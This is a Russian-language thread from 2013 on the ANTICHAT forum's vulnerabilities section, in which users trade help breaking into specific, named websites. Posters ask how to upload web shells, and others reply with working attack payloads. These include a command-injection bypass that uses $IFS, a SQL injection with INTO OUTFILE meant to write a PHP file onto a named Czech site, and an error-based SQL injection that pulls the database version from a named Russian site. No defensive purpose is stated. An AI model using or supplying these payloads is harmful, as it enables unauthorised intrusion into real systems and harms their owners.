HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21991  
Старый 19.01.2013, 12:05
NichRaMEs
Новичок
Регистрация: 23.01.2010
Сообщений: 0
Провел на форуме:
1865

Репутация: 0
По умолчанию

Приветствую Вас. Я хотел бы спросить, возможно ли залить шелл на XenForo версии 1.0.4? Если да, то стучите в ЛС. Или расскажите тут. Заранее благодарен)
 
Ответить с цитированием

  #21992  
Старый 20.01.2013, 14:33
Faaax
Guest
Сообщений: n/a
Провел на форуме:
124363

Репутация: 11
По умолчанию

помогите раскрутить,что то не получается

инъекция в заголовке в x-forwarded-for: 1'"

Код:
Code:
http://drive.s13.ru/?id=1
а то чё то туплю.
 
Ответить с цитированием

  #21993  
Старый 20.01.2013, 22:10
Sat-hacker
Guest
Сообщений: n/a
Провел на форуме:
34457

Репутация: -10
По умолчанию

Залил shell на форум,открыл но там такая ситуация.

http://savepic.org/2581219.png

права на загрузку есть в папку tmp мона ли как-то оттуда потом открыть shell ? спасибо.
 
Ответить с цитированием

  #21994  
Старый 20.01.2013, 22:15
Vip77
Guest
Сообщений: n/a
Провел на форуме:
46989

Репутация: 20
По умолчанию

Помогите плиз, есть сайт при запросе page=1;ls отображает содержимое текущей директории, а вот при запросах с пробелами на пример page=1;ls -lha ничего не отображает.
 
Ответить с цитированием

  #21995  
Старый 21.01.2013, 00:48
Faaax
Guest
Сообщений: n/a
Провел на форуме:
124363

Репутация: 11
По умолчанию

Цитата:
Сообщение от Vip77  
Vip77 said:
Помогите плиз, есть сайт при запросе page=1;ls отображает содержимое текущей директории, а вот при запросах с пробелами на пример page=1;ls -lha ничего не отображает.
пробуй так

Код:
Code:
ls$IFS-la
 
Ответить с цитированием

  #21996  
Старый 21.01.2013, 03:03
DonaldDuck
Guest
Сообщений: n/a
Провел на форуме:
41100

Репутация: 1
По умолчанию

Запрос:

Код:
Code:
http://www.rengl.cz/ceniky/mesto.php?id=-119'+union+select+1,'',3,4,5,6,7,8,9,10 INTO OUTFILE '/srv/http/adent.cz/rengl.cz/1.php' --+
Результат (файл rengl.cz/1.php не создается):

Код:
Code:
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /srv/http/adent.cz/rengl.cz/ceniky/mesto.php on line 37
Почему?
 
Ответить с цитированием

  #21997  
Старый 21.01.2013, 03:51
Faaax
Guest
Сообщений: n/a
Провел на форуме:
124363

Репутация: 11
По умолчанию

в HEX переведи попробуй.

Может ещё быть что прав нет на корневую папку,ищи врайтабельную.
 
Ответить с цитированием

  #21998  
Старый 21.01.2013, 09:39
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от Faaax  
Faaax said:
в HEX переведи попробуй.
Да что вы говорите ? И из hex код исполнится ? Бред !!

можно и нужно урезать до

Попробуй.
 
Ответить с цитированием

  #21999  
Старый 21.01.2013, 16:02
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию

Есть скуля, раскрутить не знаю как

_http://tagilcity.ru/component/option,com_fireboard/func,fbprofile/task,showprf'/?option=com_fireboard&func=showcat&Go=%25D0%2598%2 5D0%25B4%25D1%2582%25D0%25B8&catid=171
 
Ответить с цитированием

  #22000  
Старый 21.01.2013, 20:43
Unknown
Guest
Сообщений: n/a
Провел на форуме:
28262

Репутация: 23
По умолчанию

Цитата:
Сообщение от er9j6@  
er9j6@ said:
Есть скуля, раскрутить не знаю как
_http://tagilcity.ru/component/option,com_fireboard/func,fbprofile/task,showprf'/?option=com_fireboard&func=showcat&Go=%25D0%2598%2 5D0%25B4%25D1%2582%25D0%25B8&catid=171
Код:
Code:
http://tagilcity.ru/index.php?option=com_fireboard'+AND+(SELECT+4662+FROM(SELECT+COUNT(*),CONCAT(0x7e414e5449434841547e,(SELECT(CASE+WHEN+(4662=4662)+THEN+version()+ELSE+0+END)),0x7e414e5449434841547e,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)+AND+'RGKx'='RGKx&func=fbprofile&task=showprf
Найденную Вами SQL инъекцию можно сократить, т.к. запрос один и тот же, только вот первая его часть представлена как ЧПУ, а вторам с GET параметрами, собственно реализацию которой я Вам и продемонстрировал.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT.XYZ